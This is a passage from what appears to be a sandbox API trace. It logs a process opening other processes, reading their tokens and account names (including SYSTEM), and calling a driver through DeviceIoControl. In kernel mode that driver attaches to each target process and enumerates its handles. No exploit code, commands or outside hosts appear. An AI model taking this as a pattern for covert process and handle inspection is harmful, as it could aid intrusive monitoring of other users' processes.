ApcState=0xfffff880052b35d0) [0226.642] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001915e40, HandleInformation=0x0) returned 0x0 [0226.642] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.642] PsReleaseProcessExitSynchronization () returned 0x2 [0226.642] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0226.642] ObQueryNameString (in: Object=0xfffff8a001915e40, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.642] ObfDereferenceObject (Object=0xfffff8a001915e40) returned 0x1 [0226.642] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.642] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9c4) returned 0xc8 [0226.643] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.643] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002164b30, HandleInformation=0x0) returned 0x0 [0226.643] ObOpenObjectByPointer (in: Object=0xfffffa8002164b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.643] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x14 [0226.643] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.643] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.643] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.643] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.643] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.644] CloseHandle (hObject=0xc4) returned 1 [0226.644] CloseHandle (hObject=0xc8) returned 1 [0226.645] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.645] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.645] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.645] PsAcquireProcessExitSynchronization () returned 0x0 [0226.645] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0) [0226.645] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80021644f0, HandleInformation=0x0) returned 0x0 [0226.645] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.645] PsReleaseProcessExitSynchronization () returned 0x2 [0226.645] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0226.645] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.645] ObfDereferenceObject (Object=0xfffffa80021644f0) returned 0x1 [0226.645] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.645] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.645] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.645] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0226.645] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.645] PsAcquireProcessExitSynchronization () returned 0x0 [0226.645] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0) [0226.645] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80021617d0, HandleInformation=0x0) returned 0x0 [0226.645] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.645] PsReleaseProcessExitSynchronization () returned 0x2 [0226.645] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0226.645] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.645] ObfDereferenceObject (Object=0xfffffa80021617d0) returned 0x1 [0226.645] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.645] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.646] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.646] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.646] PsAcquireProcessExitSynchronization () returned 0x0 [0226.646] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0) [0226.646] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.646] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.646] PsReleaseProcessExitSynchronization () returned 0x2 [0226.646] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0226.646] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.646] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.646] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.646] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.646] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.646] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.646] PsAcquireProcessExitSynchronization () returned 0x0 [0226.646] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0) [0226.646] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800216a070, HandleInformation=0x0) returned 0x0 [0226.646] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.646] PsReleaseProcessExitSynchronization () returned 0x2 [0226.646] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0226.646] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.646] ObfDereferenceObject (Object=0xfffffa800216a070) returned 0x1 [0226.646] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.646] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.646] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.646] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.646] PsAcquireProcessExitSynchronization () returned 0x0 [0226.646] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880052b35d0) [0226.646] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00191b4c0, HandleInformation=0x0) returned 0x0 [0226.647] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.647] PsReleaseProcessExitSynchronization () returned 0x2 [0226.647] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0226.647] ObQueryNameString (in: Object=0xfffff8a00191b4c0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.647] ObfDereferenceObject (Object=0xfffff8a00191b4c0) returned 0x1 [0226.647] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.647] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc8 [0226.647] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.647] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002089b30, HandleInformation=0x0) returned 0x0 [0226.647] ObOpenObjectByPointer (in: Object=0xfffffa8002089b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.647] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x3b [0226.647] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.647] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.647] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.647] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.647] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.659] CloseHandle (hObject=0xc4) returned 1 [0226.659] CloseHandle (hObject=0xc8) returned 1 [0226.659] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.659] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0226.659] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.659] PsAcquireProcessExitSynchronization () returned 0x0 [0226.659] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0226.660] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020b7070, HandleInformation=0x0) returned 0x0 [0226.660] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.660] PsReleaseProcessExitSynchronization () returned 0x2 [0226.660] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0226.660] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.660] ObfDereferenceObject (Object=0xfffffa80020b7070) returned 0x1 [0226.660] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.660] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.660] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.660] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0226.660] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.660] PsAcquireProcessExitSynchronization () returned 0x0 [0226.660] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0226.660] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020ccf20, HandleInformation=0x0) returned 0x0 [0226.660] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.660] PsReleaseProcessExitSynchronization () returned 0x2 [0226.660] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0226.660] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.660] ObfDereferenceObject (Object=0xfffffa80020ccf20) returned 0x1 [0226.660] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.660] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.660] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.660] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0226.660] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.661] PsAcquireProcessExitSynchronization () returned 0x0 [0226.661] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0226.661] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00135e760, HandleInformation=0x0) returned 0x0 [0226.661] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.661] PsReleaseProcessExitSynchronization () returned 0x2 [0226.661] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0226.661] ObQueryNameString (in: Object=0xfffff8a00135e760, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.661] ObfDereferenceObject (Object=0xfffff8a00135e760) returned 0x3 [0226.661] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.661] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.661] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.661] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0226.661] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.661] PsAcquireProcessExitSynchronization () returned 0x0 [0226.661] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0226.661] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0226.661] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.661] PsReleaseProcessExitSynchronization () returned 0x2 [0226.661] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0226.661] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.661] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0226.661] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.661] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.661] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.661] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0226.661] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.661] PsAcquireProcessExitSynchronization () returned 0x0 [0226.661] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0226.661] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0226.662] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.662] PsReleaseProcessExitSynchronization () returned 0x2 [0226.662] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0226.662] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.662] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0226.662] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.662] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.662] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.662] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0226.662] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.662] PsAcquireProcessExitSynchronization () returned 0x0 [0226.662] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0226.662] ObReferenceObjectByHandle (in: Handle=0x1ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003662600, HandleInformation=0x0) returned 0x0 [0226.662] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.662] PsReleaseProcessExitSynchronization () returned 0x2 [0226.662] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0226.662] ObQueryNameString (in: Object=0xfffffa8003662600, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.662] ObfDereferenceObject (Object=0xfffffa8003662600) returned 0x1 [0226.662] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.662] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.662] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.662] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0226.662] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.662] PsAcquireProcessExitSynchronization () returned 0x0 [0226.662] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0226.662] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80116ab630, HandleInformation=0x0) returned 0x0 [0226.662] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.662] PsReleaseProcessExitSynchronization () returned 0x2 [0226.662] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0226.662] ObQueryNameString (in: Object=0xfffffa80116ab630, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.662] ObfDereferenceObject (Object=0xfffffa80116ab630) returned 0x2 [0226.662] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.663] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb40) returned 0xc8 [0226.663] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.663] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, 